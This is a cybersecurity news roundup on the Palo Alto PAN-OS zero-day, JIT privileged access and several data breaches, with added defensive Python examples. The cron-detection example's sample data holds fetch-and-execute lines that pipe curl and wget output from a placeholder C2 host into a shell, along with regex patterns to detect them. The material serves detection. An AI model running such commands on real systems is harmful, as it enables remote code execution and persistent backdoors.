Canary Trap’s Bi-Weekly Cyber Roundup

Welcome to this week’s edition of the “Bi-Weekly Cyber Roundup” by Canary Trap. At Canary Trap, it is our mission to keep you up-to-date with the most crucial news in the world of cybersecurity and this bi-weekly publication is your gateway to the latest news.

In this week’s roundup, we delve into the Palo Alto exploit, providing comprehensive details on the incident. We also explore a range of news stories, including data breaches at Roku, Giant Tiger, and the U.S. Federal Government. Additionally, we examine an emerging trend in Privileged Access Management (PAM) solutions, focusing on the utilization of Just-in-Time (JIT) privileged access.

  • Threat Actors Exploited Palo Alto PAN-OS Issue to Deploy a Python Backdoor

Since March 26, 2024, threat actors have been exploiting a critical zero-day vulnerability, CVE-2024-3400, in Palo Alto Networks PAN-OS software. This flaw, with a CVSS score of 10.0, enables unauthenticated attackers to execute arbitrary code with root privileges on affected firewalls. Palo Alto Networks and Unit 42 are actively investigating this vulnerability and have dubbed the related activity as “Operation MidnightEclipse.”

The exploit involves the threat actor creating a cron job that runs every minute, fetching commands hosted on an external server and executing them via bash. Although researchers were unable to retrieve the executed commands, they suspect the deployment of a Python-based backdoor, referred to as UPSTYLE. This backdoor, hosted at different URLs, creates and executes additional Python scripts, leading to the establishment of a reverse shell on the firewall device.
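The persistence mechanism described above (a cron job that runs every minute, fetches commands from a remote host and pipes them into a shell) is also a good detection target. The following is an added example, not code from the original roundup or from Unit 42; it parses crontab entries and flags the fetch-and-execute pattern. The crontab lines, the EXAMPLE-C2-HOST placeholder and the script paths are constructed for the demonstration and are not indicators from the incident.

```python
import re
from dataclasses import dataclass

# Constructed crontab for demonstration only; the host and paths are placeholders, not IoCs.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
* * * * * curl -s http://EXAMPLE-C2-HOST/cmd | bash
*/1 * * * * wget -qO- https://EXAMPLE-C2-HOST/x | sh -
30 6 * * 1 /opt/scripts/rotate-logs.sh
* * * * * /usr/bin/python3 /opt/monitor/heartbeat.py
"""

FETCH_TOOLS = re.compile(r"\b(curl|wget|fetch)\b")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba)?sh\b")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: list


def every_minute(fields):
    """True when the minute field fires on every minute ('*' or '*/1')."""
    return fields[0] in ("*", "*/1")


def parse_crontab(text):
    """Yield (line_no, schedule_fields, command) for each non-comment, non-empty entry."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:  # malformed or environment assignment; skip
            continue
        yield n, parts[:5], parts[5]


def find_suspicious_crons(text):
    """Flag entries that fetch content from a remote URL and pipe it into a shell.

    The every-minute schedule is recorded as supporting evidence but is not
    required on its own, since many legitimate monitoring jobs run that often.
    """
    findings = []
    for n, fields, cmd in parse_crontab(text):
        reasons = []
        if every_minute(fields):
            reasons.append("runs every minute")
        if FETCH_TOOLS.search(cmd) and REMOTE_URL.search(cmd):
            reasons.append("fetches from remote URL")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes output to shell")
        if "fetches from remote URL" in reasons and "pipes output to shell" in reasons:
            findings.append(Finding(n, " ".join(fields), cmd, reasons))
    return findings


if __name__ == "__main__":
    for f in find_suspicious_crons(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.schedule}] {f.command} -> {', '.join(f.reasons)}")
```

Run against the system crontab, per-user crontabs and the `/etc/cron.d` drop-in directory; the heartbeat entry in the sample shows why the schedule alone is not treated as a finding.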

The threat actor, identified by Volexity as UTA0218, aims to extract configuration data from compromised devices to expand laterally within targeted organizations. Successful exploitation has been observed at multiple organizations since March 26, 2024, indicating the threat actor’s systematic testing of the vulnerability. Following successful exploitation, UTA0218 downloads additional tools from remote servers to facilitate access to internal networks, demonstrating a high level of sophistication and capability. The exploitation of CVE-2024-3400 poses a significant threat to organizations using Palo Alto Networks PAN-OS software. The rapid and widespread exploitation by threat actors underscores the critical importance of promptly applying security patches and implementing robust security measures to mitigate the risk of cyberattacks.

Security firm Volexity confirmed active exploitation of the vulnerability, with threat actors using it to backdoor PAN-OS devices, breach networks, and exfiltrate data. Tracked as UTA0218, these attacks are believed to be conducted by state-sponsored threat actors due to the sophistication and resources required. Threat researcher Yutaka Sejiyama discovered over 82,000 vulnerable PAN-OS devices globally, with 40% located in the United States. In response, CISA has added CVE-2024-3400 to its Known Exploited Vulnerabilities catalog, requiring federal agencies to apply mitigation measures or disable telemetry within a week.

Palo Alto Networks has begun releasing hotfixes to address the zero-day vulnerability. Admins are advised to apply hotfixes promptly and consider disabling telemetry on vulnerable devices until patches are deployed. Additionally, activating threat prevention-based mitigations can help block ongoing attacks for those with an active ‘Threat Prevention’ subscription.

  • Timing is Everything: The Role of Just-in-Time Privileged Access in Security Evolution

Privileged Access Management (PAM) solutions have evolved to include Just-in-Time (JIT) privileged access provisioning as a response to the risks associated with prolonged high-level access. JIT provisioning aims to limit these risks by temporarily granting privileges only when necessary, aligning with the principle of least privilege.

JIT provisioning offers several advantages, including reducing the risk of privilege escalation and minimizing the attack surface for credential-based attacks. By eliminating standing privileges and granting access only during active requests, JIT provisioning disrupts attackers’ reconnaissance efforts and restricts their ability to exploit accounts with excessive privileges.

Implementing JIT provisioning with Safeguard, a PAM solution, involves creating regular user accounts within Active Directory, which remain disabled until activated as part of an access request workflow. Safeguard automatically activates these accounts, adds them to privileged groups, such as Domain Admins, grants necessary access rights, and disables them once the access request is completed. Enhancing JIT provisioning with Active Roles ARS, an Active Directory management tool, allows for more sophisticated automation and customization of provisioning processes. Active Roles can automate account activation, group membership management, and attribute synchronization within Active Directory, further strengthening security and mitigating risks associated with privileged access.
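To make the workflow above concrete (account disabled by default, activated and added to a privileged group for the life of an approved request, then removed and disabled again), here is an added example that is not part of the original article and not Safeguard or Active Roles code. It models the broker logic against an in-memory stand-in for the directory, so it runs offline; the account names, group names and ticket identifiers are constructed. The `standing_privileges` check is the invariant a JIT design is meant to guarantee: outside an active grant, no account holds a privileged group membership.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta


@dataclass
class Account:
    name: str
    enabled: bool = False          # JIT accounts are created disabled
    groups: set = field(default_factory=set)


@dataclass
class Grant:
    account: str
    group: str
    ticket: str
    granted_at: datetime
    expires_at: datetime


class FakeDirectory:
    """In-memory stand-in for Active Directory (constructed for this example)."""

    def __init__(self):
        self.accounts = {}

    def create_disabled(self, name):
        self.accounts[name] = Account(name)


class JitBroker:
    """Approves time-boxed requests and enforces removal when they end."""

    def __init__(self, directory, privileged_groups, max_minutes=60):
        self.directory = directory
        self.privileged_groups = set(privileged_groups)
        self.max_minutes = max_minutes
        self.active = {}   # account name -> Grant
        self.audit = []    # (timestamp, event, account, group, ticket)

    def request_access(self, account, group, minutes, ticket, now):
        if group not in self.privileged_groups:
            raise ValueError(f"{group} is not managed by the JIT policy")
        if not 0 < minutes <= self.max_minutes:
            raise ValueError(f"duration must be 1..{self.max_minutes} minutes")
        if account in self.active:
            raise ValueError(f"{account} already holds an active grant")
        acct = self.directory.accounts[account]
        acct.enabled = True
        acct.groups.add(group)
        grant = Grant(account, group, ticket, now, now + timedelta(minutes=minutes))
        self.active[account] = grant
        self.audit.append((now, "grant", account, group, ticket))
        return grant

    def revoke(self, account, now, reason):
        grant = self.active.pop(account)
        acct = self.directory.accounts[account]
        acct.groups.discard(grant.group)
        acct.enabled = False
        self.audit.append((now, f"revoke:{reason}", account, grant.group, grant.ticket))

    def expire(self, now):
        """Called on a schedule; revokes every grant whose window has closed."""
        for account, grant in list(self.active.items()):
            if now >= grant.expires_at:
                self.revoke(account, now, "expired")

    def standing_privileges(self):
        """Accounts in a privileged group with no active grant; should always be empty."""
        return sorted(a.name for a in self.directory.accounts.values()
                      if a.groups & self.privileged_groups and a.name not in self.active)


def demo():
    ad = FakeDirectory()
    ad.create_disabled("jit-dbadmin")
    broker = JitBroker(ad, privileged_groups={"Domain Admins"}, max_minutes=60)
    t0 = datetime(2024, 4, 15, 9, 0)
    broker.request_access("jit-dbadmin", "Domain Admins", 30, "CHG-0001", t0)
    during = (ad.accounts["jit-dbadmin"].enabled, "Domain Admins" in ad.accounts["jit-dbadmin"].groups)
    broker.expire(t0 + timedelta(minutes=31))
    after = (ad.accounts["jit-dbadmin"].enabled, "Domain Admins" in ad.accounts["jit-dbadmin"].groups)
    return during, after, broker.standing_privileges(), len(broker.audit)


if __name__ == "__main__":
    print(demo())
```

The broker refuses groups outside the policy, caps the request duration, and records both the grant and the revocation, which is the audit trail a reviewer would expect from a PAM workflow.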

JIT provisioning is a critical component of a comprehensive PAM strategy, offering organizations the ability to reduce privilege misuse, enhance security, and ensure that users access privileged resources only when necessary. By combining Safeguard with Active Roles, organizations can implement robust JIT provisioning policies to strengthen security posture and mitigate potential risks associated with privileged access.

  • Canadian Retail Chain Giant Tiger Data Breach May Have Impacted Millions of Customers

In March 2024, a threat actor known as ShopifyGUY claimed responsibility for hacking Giant Tiger, a Canadian retail chain with over 260 stores nationwide. The hacker leaked 2.8 million records, including email addresses, names, phone numbers, and physical addresses, on a hacker forum. However, financial data was reportedly unaffected. The compromised data was allegedly stolen earlier that year. Customers can verify if their information is included in the breach by using the data breach monitoring service HaveIBeenPwned. The leaked archive is available for download on the forum for 8 credits per member. This incident underscores the ongoing threat posed by cyberattacks to the security of personal information, emphasizing the importance of robust cybersecurity measures for both individuals and organizations.

  • Roku Disclosed a New Security Breach Impacting 576,000 Accounts

Roku recently disclosed that approximately 576,000 accounts fell victim to credential stuffing attacks, where threat actors exploited stolen credentials from third-party platforms. Credential stuffing involves using automated tools to try breached usernames and passwords on various platforms until successful logins are found, enabling unauthorized access to accounts for data theft or misuse. Roku detected unusual activity earlier this year, prompting an investigation that revealed around 15,000 compromised accounts from a separate source through credential stuffing. After notifying affected users, a subsequent breach impacted an additional 576,000 accounts. Roku clarified that their systems weren’t compromised, suggesting the attackers obtained login credentials elsewhere. Though some unauthorized purchases occurred, sensitive information like full credit card numbers remained secure. To prevent future breaches, Roku initiated password resets for impacted accounts, introduced two-factor authentication (2FA) for all users, and committed to refunding unauthorized purchases. They encourage users to adopt strong, unique passwords and remain vigilant for suspicious activity.
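Credential stuffing, as described above, has a recognisable shape in authentication logs: one source trying many different usernames in a short window, with a low success rate. The following is an added example, not code from Roku or from the original roundup; it runs a simple sliding-window detector over constructed log lines (the format, the usernames and the TEST-NET addresses are all made up for this example). It also records any successful login from a source already flagged, since those are the accounts to reset first.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format and sample lines; addresses are from the documentation ranges.
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) src=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)

SAMPLE_LOG = """\
2024-04-12T10:00:01Z src=203.0.113.5 user=alice result=FAIL
2024-04-12T10:00:02Z src=203.0.113.5 user=bob result=FAIL
2024-04-12T10:00:03Z src=203.0.113.5 user=carol result=FAIL
2024-04-12T10:00:04Z src=203.0.113.5 user=dave result=FAIL
2024-04-12T10:00:05Z src=203.0.113.5 user=erin result=OK
2024-04-12T10:00:10Z src=198.51.100.7 user=frank result=FAIL
2024-04-12T10:00:15Z src=198.51.100.7 user=frank result=FAIL
2024-04-12T10:00:20Z src=198.51.100.7 user=frank result=OK
2024-04-12T10:30:00Z src=203.0.113.9 user=gina result=FAIL
2024-04-12T10:45:00Z src=203.0.113.9 user=hank result=FAIL
2024-04-12T11:00:00Z src=203.0.113.9 user=ivan result=FAIL
"""


def parse(text):
    """Yield (timestamp, source ip, username, result) for each well-formed line."""
    for raw in text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        yield ts, m["ip"], m["user"], m["result"]


class StuffingDetector:
    """Flags a source once it fails against N distinct usernames within the window."""

    def __init__(self, window_seconds=60, distinct_user_threshold=3):
        self.window = timedelta(seconds=window_seconds)
        self.threshold = distinct_user_threshold
        self.failures = defaultdict(deque)   # ip -> deque of (ts, user), oldest first
        self.flagged = set()
        self.alerts = []                     # (ip, first alert time, usernames tried)
        self.suspect_logins = []             # (ip, user) successes from a flagged source

    def observe(self, ts, ip, user, result):
        if result == "OK":
            if ip in self.flagged:
                self.suspect_logins.append((ip, user))
            return
        q = self.failures[ip]
        q.append((ts, user))
        while q and ts - q[0][0] > self.window:   # drop failures outside the window
            q.popleft()
        distinct = {u for _, u in q}
        if len(distinct) >= self.threshold and ip not in self.flagged:
            self.flagged.add(ip)
            self.alerts.append((ip, ts, sorted(distinct)))


def analyze(text, **kwargs):
    det = StuffingDetector(**kwargs)
    for record in parse(text):
        det.observe(*record)
    return det


if __name__ == "__main__":
    det = analyze(SAMPLE_LOG)
    for ip, ts, users in det.alerts:
        print(f"{ts.isoformat()} stuffing from {ip}: {len(users)} usernames")
    for ip, user in det.suspect_logins:
        print(f"reset and review: {user} (login from flagged source {ip})")
```

The repeated failures from 198.51.100.7 are a single user mistyping a password and are not flagged, and the three failures from 203.0.113.9 fall outside a 60-second window; widening the window to an hour catches that slower pattern, which is the tuning trade-off between low-and-slow sprays and false positives.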

  • U.S. Says Russian Hackers Stole Federal Government Emails During Microsoft Cyberattack

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has confirmed that Russian government-backed hackers, known as “Midnight Blizzard” or APT29, successfully stole emails from multiple U.S. federal agencies during an ongoing cyberattack targeting Microsoft. This revelation underscores the significant risks posed by sophisticated cyber adversaries to government agencies and critical infrastructure.

CISA’s statement, released Thursday, highlights the severity of the cyberattack, which exploited vulnerabilities in Microsoft’s corporate email accounts to exfiltrate sensitive correspondence between federal agencies and the technology giant. The agency issued an emergency directive on April 2, mandating civilian government agencies to enhance their email security measures in response to heightened intrusions by Russian hackers. Despite not disclosing the names of affected federal agencies, CISA’s actions underscore the urgency of the situation and the need for swift remediation efforts. The emergency directive aims to mitigate further compromise of government systems and safeguard sensitive information from unauthorized access.

Microsoft, which first disclosed the Russian hacking group’s intrusion in January, continues to face scrutiny over its security practices. The company has been working to expel the hackers from its systems, but the ongoing nature of the attack underscores the challenges in defending against sophisticated cyber threats. Moreover, recent incidents, including a breach attributed to Chinese government-backed hackers and data exposure involving the U.S. Department of Defense, highlight the broader vulnerabilities within Microsoft’s infrastructure and the potential ramifications for both government and private sector entities.

As cyber adversaries continue to evolve in sophistication and persistence, collaboration between government agencies, private sector organizations, and technology providers remains essential to bolstering national cybersecurity defenses and safeguarding digital infrastructure from malicious actors.